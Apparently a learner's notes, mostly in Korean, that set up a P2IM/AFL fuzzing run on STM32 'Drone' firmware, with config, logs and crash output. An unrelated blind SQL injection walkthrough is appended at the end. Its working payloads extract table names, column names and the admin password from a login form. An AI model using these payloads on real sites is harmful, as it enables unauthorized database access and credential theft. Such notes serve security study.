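# Create the per-run working directory for a P2IM fuzzing run and seed it.
# The path must equal working_dir in fuzz.cfg (base/fuzzing/program/run),
# otherwise fuzz.py and afl-fuzz look for inputs/ and the firmware elsewhere.
WORKING_DIR=~/tmp/p2im/fuzzing/Drone/5/
mkdir -p "${WORKING_DIR}"
# Stop if the directory is unusable; without the guard the copy below would
# silently land in whatever directory the shell happened to be in.
cd "${WORKING_DIR}" || exit 1
# Copy the template seed corpus to inputs/, the directory fuzz.cfg hands to
# afl-fuzz as -i. With no pre-existing inputs/ cp creates it holding the
# seeds themselves; if inputs/ already exists, cp nests them as inputs/seeds/
# and afl-fuzz would see no seed files at the top level.
cp -r ~/tmp/p2im/fuzzing/templates/seeds/ "${WORKING_DIR}/inputs"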
fuzz.cfg 수정 (fuzz.py / me.py / cov.py가 읽는 설정 파일. 경로는 모두 절대 경로로 적고, working_dir 값이 위에서 만든 디렉터리와 같아야 한다)
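# P2IM - fuzzing configuration (fuzz.cfg) for the Drone firmware, run 5
# ------------------------------------------------------
# Copyright (C) 2018-2020 RiS3 Lab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at:
# <http://www.apache.org/licenses/LICENSE-2.0>
#
# Read by fuzz.py, me.py and cov.py through Python configparser. %(key)s
# references are expanded from the same section and from [DEFAULT], so a
# literal percent sign would have to be written as %%.
# Keep every comment on a line of its own. Whether text after a value on
# the same line is stripped as a comment or kept as part of the value
# depends on how the parser was constructed; a note glued to `base` would
# silently corrupt every path derived from it below.
# Please use absolute paths in this file.

# [DEFAULT] is used only by fuzz.py; its keys are also visible to every
# other section through %(...)s interpolation.
[DEFAULT]
# Root directory of the P2IM git checkout (the tool, not the target).
base = /home/babyhack/tmp/p2im
# Arbitrary label for the target; it also names the working directory and
# does not have to match the firmware binary name.
program = Drone
# Each firmware may be fuzzed several times, so every run gets its own number.
run = 5
# Working directory of this fuzzing run. The shell setup, the seed corpus
# and the `img` path below must all agree with it.
working_dir = %(base)s/fuzzing/%(program)s/%(run)s

# [afl] is used only by fuzz.py.
[afl]
bin = %(base)s/afl/afl-fuzz
# Per-execution timeout handed to afl-fuzz as -t, in milliseconds. The
# trailing "+" makes afl-fuzz skip seeds that time out instead of aborting.
timeout = 150+
# Seed corpus (afl-fuzz -i) and findings directory (afl-fuzz -o); crashes
# end up in %(output)s/crashes and hangs in %(output)s/hangs.
input = %(working_dir)s/inputs
output = %(working_dir)s/outputs

# [cov] is used only by cov.py.
[cov]
# Presumably whether inputs that hang are still counted toward coverage;
# confirm against cov.py before relying on it.
#count_hang = False
count_hang = True
bbl_cov_read_sz = 20000000
# Timeout in seconds.
timeout = 1

[qemu]
bin = %(base)s/qemu/precompiled_bin/qemu-system-gnuarmeclipse
# QEMU -d log categories. The commented variant adds "exec" (every executed
# translation block, written to qemu.log via -D); that is far too verbose
# for a fuzzing campaign and should only be enabled to debug a single run.
log = unimp,guest_errors,int
#log = unimp,guest_errors,exec,int -D qemu.log

[program]
# Board/MCU pairs supported by the bundled QEMU are listed below. Exactly
# one pair must be active, and it has to match the firmware's real target.
#board = STM32F429I-Discovery
#mcu = STM32F429ZI
board = NUCLEO-F103RB
mcu = STM32F103RB
#board = Arduino-Due
#mcu = SAM3X8E
#board = FRDM-K64F
#mcu = MK64FN1M0VLL12
# Path of the firmware ELF (not a raw .bin): me.py runs objdump on it and
# QEMU loads it with -image. The file name is case-sensitive.
img = %(working_dir)s/Drone

[model]
retry_num = 3
peri_addr_range = 512
# Absolute path to arm-none-eabi-objdump from the GNU Arm Embedded Toolchain
# installed while setting up P2IM, e.g.
# /home/bo/gcc-arm-none-eabi-6-2017-q2-update/bin/arm-none-eabi-objdump
# If me.py's stage1_5 fails with "OSError: [Errno 8] Exec format error", the
# kernel refused to execute this binary itself, not the firmware image:
# typically the toolchain tarball was built for a different host
# architecture (or the path points at a non-executable). Check with `file`.
objdump = /home/babyhack/tmp/gcc-arm-none-eabi-10.3-2021.10/bin/arm-none-eabi-objdump
# Keys below are used only by fuzz.py.
bin = %(base)s/model_instantiation/me.py
log_file = %(working_dir)s/me.log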
fuzzing 작업 디렉터리 구성: 대상 펌웨어 ELF(Drone)를 작업 디렉터리에 복사한다. 파일명은 fuzz.cfg의 img 값과 대소문자까지 일치해야 하며, 복사 후 디렉터리에는 Drone, fuzz.cfg, inputs/ 가 있어야 한다.
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ cp /home/babyhack/tmp/p2im/externals/p2im-real_firmware/Drone ./
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ ls
Drone fuzz.cfg inputs
Fuzzer 실행 (fuzz.py는 먼저 me.py로 입력 없이 주변장치 모델을 추출하고, 시드 입력으로 펌웨어를 돌려 보며 모델을 보정한 뒤 afl-fuzz를 띄운다)
#python3 ~/tmp/p2im/model_instantiation/fuzz.py -c fuzz.cfg
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ python3 ~/tmp/p2im/model_instantiation/fuzz.py -c fuzz.cfg
Change working dir to: /home/babyhack/tmp/p2im/fuzzing/Drone/5
CWD: /home/babyhack/tmp/p2im/fuzzing/Drone/5
try our best to extract model w/o input
cmd_me0: /home/babyhack/tmp/p2im/model_instantiation/me.py -c /home/babyhack/tmp/p2im/fuzzing/Drone/5/fuzz.cfg --run-num 0 --print-to-file
Change working dir to: 0/
CWD: /home/babyhack/tmp/p2im/fuzzing/Drone/5/0
Redirect stdout to file named stdout
모델 추출(ME) 반복 로그: 0.random.N 디렉터리마다 시드 입력으로 펌웨어를 실행해 aup 발생 여부를 확인하고, 발생하면 me.py를 다시 돌린다. 아래 Traceback의 `OSError: [Errno 8] Exec format error`는 `subprocess.check_output([cfg.objdump, ...])`에서 objdump 바이너리 자체의 실행이 거부된 것으로, 펌웨어 이미지가 아니라 fuzz.cfg의 objdump 경로가 가리키는 툴체인이 호스트 아키텍처와 맞지 않거나 실행 파일이 아닐 때 발생한다. `file` 명령으로 해당 바이너리를 확인한다.
0.random.8
run f/w w/ seed input to check if there is aup
cmd_qemu: /home/babyhack/tmp/p2im/qemu/precompiled_bin/qemu-system-gnuarmeclipse -nographic -aflFile /home/bats/random -board NUCLEO-F103RB -mcu STM32F103RB -image /home/babyhack/tmp/p2im/fuzzing/Drone/5/Drone -pm-stagp2im/fuzzing/Drone/5/0.random.7/peripheral_model.json -me-bin /home/babyhack/tmp/p2im/model_instantiation/me.m/fuzzing/Drone/5/fuzz.cfg
There is aup, run ME
cmd_me: /home/babyhack/tmp/p2im/model_instantiation/me.py -c /home/babyhack/tmp/p2im/fuzzing/Drone/5/fuzz.cfge --run-from-forkserver --afl-file /home/babyhack/tmp/p2im/fuzzing/Drone/5/inputs/random --model-if /home/babdom.7/peripheral_model.json
Change working dir to: 0.random.8/
CWD: /home/babyhack/tmp/p2im/fuzzing/Drone/5/0.random.8
Redirect stdout to file named stdout
Traceback (most recent call last):
File "/home/babyhack/tmp/p2im/model_instantiation/me.py", line 1166, in <module>
srr_info = stage1_5()
File "/home/babyhack/tmp/p2im/model_instantiation/me.py", line 490, in stage1_5
objdump = subprocess.check_output([cfg.objdump, "-dC", cfg.img])
File "/usr/lib/python3.5/subprocess.py", line 626, in check_output
**kwargs).stdout
File "/usr/lib/python3.5/subprocess.py", line 693, in run
with Popen(*popenargs, **kwargs) as process:
File "/usr/lib/python3.5/subprocess.py", line 947, in __init__
restore_signals, start_new_session)
File "/usr/lib/python3.5/subprocess.py", line 1551, in _execute_child
raise child_exception_type(errno_num, err_msg)
OSError: [Errno 8] Exec format error
0.random.9
run f/w w/ seed input to check if there is aup
cmd_qemu: /home/babyhack/tmp/p2im/qemu/precompiled_bin/qemu-system-gnuarmeclipse -nographic -aflFile /home/bats/random -board NUCLEO-F103RB -mcu STM32F103RB -image /home/babyhack/tmp/p2im/fuzzing/Drone/5/Drone -pm-stagp2im/fuzzing/Drone/5/0.random.8/peripheral_model.json -me-bin /home/babyhack/tmp/p2im/model_instantiation/me.m/fuzzing/Drone/5/fuzz.cfg
.............................
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ /home/babyhack/tmp/p2im/qemu/precompiled_bin/qemu-system-gnuarme
(process:17789): GLib-WARNING **: /Host/Work/qemu/glib-2.51.0/glib/gmem.c:483: custom memory allocation vtabl
[0, 0] 1-th(total 1-th) unassigned mem_r *0x0
[0, 0] 2-th(total 2-th) unassigned mem_r *0x4
QEMU 2.3.50 monitor - type 'help' for more information
(qemu) QEMU 2.3.50 monitor - type 'help' for more information
(qemu) [8004f10, 8004f4e] 1-th(total 3-th) pm_r *0x40021000 gets 0x0, remains CR+SR
[8004f10, 8004f4e] 1-th(total 1-th) pm_w *0x40021000 = 0x1, remains CR+SR
[8004f10, 8004f4e] 2-th(total 4-th) pm_r *0x40021004 gets 0x0, remains CR
[8004f10, 8004f4e] 2-th(total 2-th) pm_w *0x40021004 = 0x0, remains CR
[8004f10, 8004f4e] 3-th(total 5-th) pm_r *0x40021000 gets 0x1, remains CR+SR
[8004f10, 8004f4e] 3-th(total 3-th) pm_w *0x40021000 = 0x1, remains CR+SR
[8004f10, 8004f4e] 4-th(total 6-th) pm_r *0x40021000 gets 0x1, remains CR+SR
[8004f10, 8004f4e] 4-th(total 4-th) pm_w *0x40021000 = 0x1, remains CR+SR
[8004f10, 8004f4e] 5-th(total 7-th) pm_r *0x40021004 gets 0x0, remains CR
[8004f10, 8004f4e] 5-th(total 5-th) pm_w *0x40021004 = 0x0, remains CR
[8004f10, 8004f4e] 6-th(total 6-th) pm_w *0x40021008 = 0x9f0000, remains DR
start up afl forkserver!
[8001128, 800113a] 6-th(total 8-th) pm_r *0x40022000 gets 0x0, remains CR
[8001128, 800113a] 7-th(total 7-th) pm_w *0x40022000 = 0x10, remains CR
[8004ccc, 8004ce8] 7-th(total 9-th) pm_r *0x40021018 gets 0x0, remains CR
[8004ccc, 8004ce8] 8-th(total 8-th) pm_w *0x40021018 = 0x1, remains CR
[8004ccc, 8004ce8] 8-th(total 10-th) pm_r *0x40021018 gets 0x1, remains CR
[8001cba, 8001cc4] 9-th(total 11-th) pm_r *0x40021004 gets 0x0, remains CR
[8001cd4, 8001cf0] 10-th(total 12-th) pm_r *0x40021000 gets 0x1, remains CR+SR
[8001cf6, 8001d10] 11-th(total 13-th) pm_r *0x40021000 gets 0x1, remains CR+SR
[8001cf6, 8001d10] 9-th(total 9-th) pm_w *0x40021000 = 0x81, remains CR+SR
...........................
환경이 맞으면 AFL Fuzzing이 시작된다. 결과는 fuzz.cfg의 output(outputs/)에 쌓이고, crashes/ 의 각 파일이 재현용 입력이며 README.txt에 그 입력을 찾을 때 사용된 전체 afl-fuzz 명령줄과 메모리 제한(2.00 GB)이 기록되므로 재현 시 같은 값을 써야 한다.
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ ls
0 0.random.1 0.random.2 0.random.3 Drone fuzz.cfg inputs me.log outputs run_fw.py
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5$ cd outputs/
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs$ ls
crashes fuzz_bitmap fuzzer_stats hangs plot_data queue
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs$ ls -sla
total 2116
4 drwx------ 5 babyhack babyhack 4096 Jan 24 06:58 .
4 drwxrwxr-x 8 babyhack babyhack 4096 Jan 24 06:51 ..
4 drwx------ 2 babyhack babyhack 4096 Jan 24 06:52 crashes
4 -rw------- 1 babyhack babyhack 164 Jan 24 06:58 .cur_input
2048 -rw------- 1 babyhack babyhack 2097152 Jan 24 06:57 fuzz_bitmap
4 -rw------- 1 babyhack babyhack 1093 Jan 24 06:57 fuzzer_stats
4 drwx------ 2 babyhack babyhack 4096 Jan 24 06:54 hangs
8 -rw------- 1 babyhack babyhack 4454 Jan 24 06:58 plot_data
36 drwx------ 3 babyhack babyhack 36864 Jan 24 06:58 queue
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs$ cd crashes/
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs/crashes$ ls
id:000000,ret_v:0x1,src:000000,op:havoc,rep:8 README.txt
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs/crashes$ ls -sla
total 16
4 drwx------ 2 babyhack babyhack 4096 Jan 24 06:52 .
4 drwx------ 5 babyhack babyhack 4096 Jan 24 06:58 ..
4 -rw------- 1 babyhack babyhack 148 Jan 24 06:52 id:000000,ret_v:0x1,src:000000,op:havoc,rep:8
4 -rw------- 1 babyhack babyhack 1106 Jan 24 06:52 README.txt
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs/crashes$ cat README.txt
Command line used to find this crash:
/home/babyhack/tmp/p2im/afl/afl-fuzz -i /home/babyhack/tmp/p2im/fuzzing/Drone/5/inputs -o /home/babyhack/tmp/p2im/fuzzing/Drone/5/outputs -t 150+ -QQ -a /home/babyhack/tmp/p2im/model_instantiation/me.py -b /home/babyhack/tmp/p2im/fuzzing/Drone/5/fuzz.cfg -c /home/babyhack/tmp/p2im/fuzzing/Drone/5/0.random.3/peripheral_model.json -T Drone_5 -d /home/babyhack/tmp/p2im/qemu/precompiled_bin/qemu-system-gnuarmeclipse -nographic -board NUCLEO-F103RB -mcu STM32F103RB -image /home/babyhack/tmp/p2im/fuzzing/Drone/5/Drone -pm-stage 3 -aflFile @@
If you can't reproduce a bug outside of afl-fuzz, be sure to set the same
memory limit. The limit used for this fuzzing session was 2.00 GB.
Need a tool to minimize test cases before investigating the crashes or sending
them to a vendor? Check out the afl-tmin that comes with the fuzzer!
Found any cool bugs in open-source tools using afl-fuzz? If yes, please drop
me a mail at <lcamtuf@coredump.cx> once the issues are fixed - I'd love to
add your finds to the gallery at:
<http://lcamtuf.coredump.cx/afl/>
Thanks :-)
babyhack@ubuntu:~/tmp/p2im/fuzzing/Drone/5/outputs/crashes$
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) > 110 #
- Response : Login Failed
:: 첫번째 문자 확인 (응답이 Success / Login Failed로만 갈리는 boolean-based blind SQLi. MySQL 문법(#, limit 0,1, information_schema)이며, ascii() 비교로 범위를 좁혀 한 글자씩 확정한다)
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) > 108 #
- Response : Success
:: 확실히 맞는지 확인
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),1,1)) = 109 #
- Response : Success
:: 두번째 문자 확인 (substr 위치만 2로 바꾼다)
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),2,1)) = 109 #
- Response : Success
:: 마지막 문자 확인 (범위를 벗어난 substr은 빈 문자열이고 MySQL에서 ascii('')=0 이므로, 7번째 글자가 0이면 테이블명 길이는 6 = "member")
' or 1=1 and ascii(substr((select table_name from information_schema.tables where table_type='base table' limit 0,1),7,1)) = 0 #
2.3. Column명 추출
[[ column 추출 - information_schema.columns ]]
--> 테이블 명에서 찾은 "member"를 활용
:: ascii 테이블을 기반으로 숫자를 변경하여 범위를 줄임
' or 1=1 and ascii(substr((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) > 110 #
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) > 53)#
:: 첫번째 컬럼 (limit 0,1) -> 110='n', 111='o' => "no"
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),1,1)) = 110)#
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 0,1),2,1)) = 111)#
:: 두번째 컬럼 (limit 1,1) -> 105='i', 100='d' => "id"
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 1,1),1,1)) = 105)#
' or 1=1 AND (select ascii(substring((select column_name from information_schema.columns where table_name='member' limit 1,1),2,1)) = 100)#
2.4. value 찾기
[[ 저장된 값 찾기 ]]
' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),1,1)) > 100)#
' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),1,1)) = 115)#
:: 115='s' 가 첫 글자. 길이 확인: 16번째 글자의 ascii가 0이면 (빈 문자열) 비밀번호 길이는 15
' or 1=1 AND (select ascii(substring((select password from member where id='admin' limit 0,1),16,1)) =0)#